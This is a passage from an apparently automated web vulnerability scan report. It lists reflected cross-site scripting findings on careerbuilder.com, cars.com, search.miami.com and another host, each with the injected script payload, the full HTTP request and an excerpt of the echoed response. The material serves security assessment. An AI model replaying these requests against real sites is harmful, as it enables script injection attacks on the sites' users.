P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=1ada416b55864b70b364400fe1ec4bd2-343071233-wx-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65088C2B54C90EA381232F5A1B73A74E39F55234E2E04AEE9D9E243F37AEFDF837155E0C8F4E2A2701C; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:52 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR34
Date: Sun, 14 Nov 2010 22:33:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh5b023'-alert(1)-'384c97332ed&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.199. http://sales-marketing.careerbuilder.com/sm.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales-marketing.careerbuilder.com
Path:   /sm.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71567"%20a%3db%2037dba5a01fa was submitted in the lr parameter. This input was echoed as 71567" a=b 37dba5a01fa in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sm.ic/Florida_Miami/?lr=cbcb_mh71567"%20a%3db%2037dba5a01fa&SiteID=cbcb_mh046 HTTP/1.1
Host: sales-marketing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199294
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=2dec5cb744574f9c9598166721519d59-343071203-wq-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B7174C4F3D987D1FF16F084FF840B84E44E723C892C16C31E97843014090580DC1E4169D092792D0; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:23 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:23 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR27
Date: Sun, 14 Nov 2010 22:33:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh71567" a=b 37dba5a01fa" />
...[SNIP]...

2.200. http://search.miami.com/search-bin/search.pl.cgi [fields parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.miami.com
Path:   /search-bin/search.pl.cgi

Issue detail

The value of the fields request parameter is copied into the HTML document as plain text between tags. The payload 91cc6<script>alert(1)</script>88b28ce8f1f was submitted in the fields parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search-bin/search.pl.cgi?product=movies&live_template=http%3A%2F%2Fmovies.miami.com%2Fsearch%2Fv-sr%2Findex.html&collection=ENDECA_INDEX&fields=91cc6<script>alert(1)</script>88b28ce8f1f&preview_template=http%3A%2F%2Fmovies-preview.miami.com%2Fsearch%2Fv-sr%2Findex.html&results_per_page=500&prop_expose_refs=0&sf_movies_showtime_dt=&sf_meta_domain=www.miamiherald.com&sort=movies_theater_geocode%2Cmovies_theater_name%2Cmovies_movie_title%2Cmovies_showtime_dt&prop_geo_radius=20&sf_movies_showtimes=&sf_movies_theater_geocode=Miami&op.x=24&op.y=9&op=Search HTTP/1.1
Host: search.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:34:43 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Expires: Sat, 13 Nov 2010 22:34:43 GMT
Mi-app-host: rsds009p
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from search.miami.com
Connection: close
Content-Length: 518

<h1>Search Error</h1>
<b>Could not retrieve Error Template.</b><br>
Error template:
<br>
error_template not set.

<p>
<b>Search Error(s)</b><br>
NM::Search::SEI::Connection: ERROR: Unable to parse query string: [search SOLR for 91cc6<script>alert(1)</script>88b28ce8f1f where meta_domain = "www.miamiherald.com" and meta_product = "movies" and movies_theater_geocode = "Miami" order by movies_theater_geocode,movies_theater_name,movies_movie_title,movies_showtime_dt lim
...[SNIP]...

2.201. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tlight2-niqwf.aacehardware.info
Path:   /tag/Special+Sales+Bear+bear/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84964"><script>alert(1)</script>ffc48037882 was submitted in the REST URL parameter 2. This input was echoed as 84964\"><script>alert(1)</script>ffc48037882 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/Special+Sales+Bear+bear84964"><script>alert(1)</script>ffc48037882/ HTTP/1.1
Host: tlight2-niqwf.aacehardware.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:35 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 8176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<html xmlns="http://
...[SNIP]...
<a href="http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear84964\"><script>alert(1)</script>ffc48037882/">
...[SNIP]...

2.202. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tlight2-niqwf.aacehardware.info
Path:   /tag/Special+Sales+Bear+bear/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9b547</title><script>alert(1)</script>a06a19bd24a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/Special+Sales+Bear+bear9b547</title><script>alert(1)</script>a06a19bd24a/ HTTP/1.1
Host: tlight2-niqwf.aacehardware.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<html xmlns="http://
...[SNIP]...
<title>Special Sales Bear Bear9b547</title><script>alert(1)</script>a06a19bd24a - tlight2-niqwf</title>
...[SNIP]...

2.203. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tlight2-niqwf.aacehardware.info
Path:   /tag/Special+Sales+Bear+bear/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d6e9<script>alert(1)</script>fc28cde05d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/Special+Sales+Bear+bear8d6e9<script>alert(1)</script>fc28cde05d5/ HTTP/1.1
Host: tlight2-niqwf.aacehardware.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:38 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<html xmlns="http://
...[SNIP]...
<a href="http://tlight2-niqwf.aacehardware.info">Special Sales Bear Bear8d6e9<script>alert(1)</script>fc28cde05d5 Home</a>
...[SNIP]...

2.204. http://tlight2-niqwf.aacehardware.info/tag/Special+Sales+Bear+bear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tlight2-niqwf.aacehardware.info
Path:   /tag/Special+Sales+Bear+bear/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65c6"><script>alert(1)</script>7d45de7dcc6 was submitted in the REST URL parameter 2. This input was echoed as c65c6\"><script>alert(1)</script>7d45de7dcc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/c65c6"><script>alert(1)</script>7d45de7dcc6/ HTTP/1.1
Host: tlight2-niqwf.aacehardware.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:37 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 10925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<html xmlns="http://
...[SNIP]...
0" marginwidth="0" marginheight="0" border="0" style="border:0;margin:0;width:728px;height:90px;" src="http://www.google.com/uds/modules/elements/newsshow/iframe.html?rsz=large&amp;format=728x90&amp;q=C65c6\"><script>alert(1)</script>7d45de7dcc6&amp;element=true" scrolling="true" allowtransparency="true">
...[SNIP]...

2.205. http://www.careerbuilder.com/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.careerbuilder.com
Path:   /

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9252"%20a%3db%2073cda56ab20 was submitted in the lr parameter. This input was echoed as c9252" a=b 73cda56ab20 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lr=cbcb_mhc9252"%20a%3db%2073cda56ab20&sc_cmp2=JS_Nav_Home&ff=21 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51063
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=f7f36667ce184a8cb9e94fbce6247967-343071309-wm-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6500CE4E9C78743F3D9DE8DB5BEB7FE82A6B7F1F5141E4907F897CC6AB6A78A6DED0A396D7BB9DAA4DC; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:09 GMT; path=/; HttpOnly
Set-Cookie: JDP=2; domain=.careerbuilder.com; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR23
Date: Sun, 14 Nov 2010 22:35:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs -
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhc9252" a=b 73cda56ab20" />
...[SNIP]...

2.206. http://www.cars.com/go/advice/Section.jsp [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/advice/Section.jsp

Issue detail

The value of the section request parameter is copied into the HTML document as plain text between tags. The payload e4373<script>alert(1)</script>19d07abf959 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/advice/Section.jsp?channel=advice&section=buye4373<script>alert(1)</script>19d07abf959&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:34:33 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000TXAD0OVgnXknoFrBCQo3CKd:155htecnj; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Fri, 13 Nov 2015 22:38:12 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Sun, 05 Dec 2010 22:38:12 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Sun, 14-Nov-2010 23:08:13 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 18783

<H1>Error page exception</H1>
<H4>The server cannot use the error page specified for your application to handle the Original Exception printed below. Please see the Error Page Exception below for a d
...[SNIP]...
</B>/advice/includes/_xSectionIndex_buye4373<script>alert(1)</script>19d07abf959.jsp<BR>
...[SNIP]...

2.207. http://www.cars.com/go/advice/Story.jsp [subject parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/advice/Story.jsp

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6a7"><a%20b%3dc>9b378c5b51d was submitted in the subject parameter. This input was echoed as ec6a7"><a b=c>9b378c5b51d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /go/advice/Story.jsp?section=fuel&subject=fuelListec6a7"><a%20b%3dc>9b378c5b51d&story=mpgClass&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:36:51 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000KN73WiX9cO3xbH7RQEXbIu0:155ki5pp2; Path=/
Set-Cookie: Registration=currentUserId:aABwP7AwONNpb7MVD5uJP7tGFQMgZeQuu0YVAyBl5C67RhUDIGXkLtdt8Lc+fbQm6DmHZY3u3I7AM3B8JpmL6LEjoBbN8YpbVk875IzXHQo=; Expires=Fri, 13 Nov 2015 22:39:00 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Sun, 05 Dec 2010 22:39:00 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Sun, 14-Nov-2010 23:09:01 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 26798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
</B>/advice/Subjects/fuelListec6a7"><a b=c>9b378c5b51d/mpgClass.jsp<BR>
...[SNIP]...

2.208. http://www.cars.com/go/advice/Story.jsp [subject parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/advice/Story.jsp

Issue detail

The value of the subject request parameter is copied into the HTML document as plain text between tags. The payload 1f8c3<a>11eb73411e3 was submitted in the subject parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /go/advice/Story.jsp?section=buy&subject=1f8c3<a>11eb73411e3&story=classResidual HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:29:56 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000Dlbc9PoZOj5pIx10Rmflnsr:155ki65ur; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:33:12 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:33:12 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 01:03:14 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 26721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
</B>/advice/Subjects/1f8c3<a>11eb73411e3/classResidual.jsp<BR>
...[SNIP]...

2.209. http://www.cars.com/go/car-dealers/ck/Miami-FL/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/car-dealers/ck/Miami-FL/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbc6"><script>alert(1)</script>db9daeb9116 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/car-dealers/ck/Miami-FL/?8cbc6"><script>alert(1)</script>db9daeb9116=1 HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:35:20 GMT
Server: IBM_HTTP_Server
Content-Length: 27086
Set-Cookie: JSESSIONID=0000nyoUNvNI7Lt10MwO8bd0UA0:155htds4n; Path=/
Set-Cookie: affiliate=national; Expires=Sun, 05 Dec 2010 22:38:59 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Sun, 14-Nov-2010 23:09:00 GMT; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


                                                                                                   <!--Story is VCNKDU-->

...[SNIP]...
<a href="http://www.cars.com/go/car-dealers/kc/Acura/Miami-FL/?8cbc6"><script>alert(1)</script>db9daeb9116=1">
...[SNIP]...

2.210. http://www.cars.com/go/crp/buyingGuides/Story.jsp [story parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/crp/buyingGuides/Story.jsp

Issue detail

The value of the story request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9a2"><a%20b%3dc>39b26a2aac5 was submitted in the story parameter. This input was echoed as dd9a2"><a b=c>39b26a2aac5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /go/crp/buyingGuides/Story.jsp?section=Sports&story=sportHot2011dd9a2"><a%20b%3dc>39b26a2aac5&subject=stories&year=New HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:19:59 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000A7uHp_Y5fhiW-XKSPatRJuz:155ki67a3; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:23:16 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:23:16 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:53:17 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 26895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
</B>/crp/buyingGuides/Subjects/New/stories/sportHot2011dd9a2"><a b=c>39b26a2aac5.jsp<BR>
...[SNIP]...

2.211. http://www.cars.com/go/crp/buyingGuides/Story.jsp [subject parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/crp/buyingGuides/Story.jsp

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177f8"><script>alert(1)</script>c46c53badf5 was submitted in the subject parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/crp/buyingGuides/Story.jsp?section=Sports&story=sportHot2011&subject=stories177f8"><script>alert(1)</script>c46c53badf5&year=New HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:21:10 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000v-tEWlZWJpVj4MgTDvyXkyJ:155htdomo; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:23:34 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:23:34 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:53:35 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 27041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
</B>/crp/buyingGuides/Subjects/New/stories177f8"><script>alert(1)</script>c46c53badf5/sportHot2011.jsp<BR>
...[SNIP]...

2.212. http://www.cars.com/go/dealersearch/specials.jsp [specialsURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/dealersearch/specials.jsp

Issue detail

The value of the specialsURL request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//f5fd4a94 was submitted in the specialsURL parameter. This input was echoed as javascript:alert(1)//f5fd4a94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/dealersearch/specials.jsp?specialsURL=javascript%3aalert(1)//f5fd4a94&apn=herald&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
